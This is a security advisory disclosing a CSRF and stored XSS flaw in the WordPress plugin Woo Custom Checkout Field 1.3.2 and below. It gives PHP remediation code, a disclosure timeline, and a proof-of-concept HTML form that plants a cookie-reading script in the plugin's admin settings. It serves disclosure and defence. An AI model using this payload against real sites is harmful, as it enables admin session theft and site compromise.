Woo Custom Checkout Field <= 1.3.2 CSRF + Stored XSS Disclosure

Datetime: 2016-08-22 21:55:20         Topic: XSS Vulnerability




Because the ccf_insert function (line 118 of include/ccf.php) performs no CSRF check and the output generated by template/datagrid.php is not entity-encoded, it is possible to store a script that executes in the context of an admin user.

CVSS Score


CVSS Vector


Versions Affected

1.3.2 and below


No official solution has been published by the vendor, nor have they acknowledged the issue at hand.

A simple, temporary workaround for the XSS vulnerability is to wrap all data output in the template/datagrid.php file in calls to htmlentities (see http://php.net/manual/en/function.htmlentities.php for usage).

To fix the CSRF vulnerability, add a nonce check to the ccf_insert function; see https://codex.wordpress.org/WordPress_Nonces for examples of how to do this.
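The two fixes above, combined, as an added illustration that is not the plugin's own code: the form emits a nonce, ccf_insert verifies it (and the user's capability) before storing anything, and the datagrid escapes every value on output. The handler body, the ccf_fields option name, the ccf_add_field/ccf_nonce names and the helper function names are assumptions.

```php
<?php
// Added illustration, not the plugin's code. Storage via get_option/update_option
// under the 'ccf_fields' option name is an assumption.

// Form side: emit a nonce field next to the existing inputs.
function ccf_render_add_field_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin.php?page=ccf_settings_menu' ) ) . '">';
    wp_nonce_field( 'ccf_add_field', 'ccf_nonce' );
    echo '<input type="text" name="txt_field_name">';
    echo '<input type="text" name="txt_field_class">';
    echo '<input type="text" name="txt_field_placeholder">';
    echo '<input type="text" name="txt_field_type">';
    echo '<input type="text" name="txt_field_options">';
    echo '<input type="submit" name="add_field" value="Submit">';
    echo '</form>';
}

// Handler side: refuse the request unless the user may change settings and
// the nonce is valid; sanitize before storing.
function ccf_insert() {
    if ( ! isset( $_POST['add_field'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // check_admin_referer() stops with a 403 page when the nonce is missing or
    // invalid, so a form submitted from another origin never reaches the store.
    check_admin_referer( 'ccf_add_field', 'ccf_nonce' );

    $field = array();
    foreach ( array( 'name', 'class', 'placeholder', 'type', 'options' ) as $key ) {
        $raw           = isset( $_POST[ 'txt_field_' . $key ] ) ? $_POST[ 'txt_field_' . $key ] : '';
        $field[ $key ] = sanitize_text_field( wp_unslash( $raw ) );
    }
    $fields   = get_option( 'ccf_fields', array() );
    $fields[] = $field;
    update_option( 'ccf_fields', $fields );
}

// Output side (template/datagrid.php): escape on output regardless of what
// was stored, so a record saved before the fix still cannot execute.
function ccf_render_datagrid_row( array $field ) {
    echo '<tr>';
    foreach ( array( 'name', 'class', 'placeholder', 'type', 'options' ) as $key ) {
        $value = isset( $field[ $key ] ) ? $field[ $key ] : '';
        echo '<td>' . htmlentities( $value, ENT_QUOTES, 'UTF-8' ) . '</td>';
    }
    echo '</tr>';
}
```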

Proof of Concept

<form method="post" action="http://[target]/wp-admin/admin.php?page=ccf_settings_menu">
    <input type="text" name="txt_field_name" value="field_name">
    <input type="text" name="txt_field_class" value="<script>alert(document.cookie);</script>">
    <input type="text" name="txt_field_placeholder" value="placeholder">
    <input type="text" name="txt_field_type" value="text">
    <input type="text" name="txt_field_options" value="">
    <input type="submit" name="add_field" value="Submit">
</form>

WordPress Exploit Framework Module




Disclosure Timeline

  • 2016-07-23 : Identified vulnerability, contacted vendor with POC and advice on how to resolve the issue.
  • 2016-07-25 : No response from vendor, contacting WordPress to report issue.
  • 2016-07-26 : Public disclosure

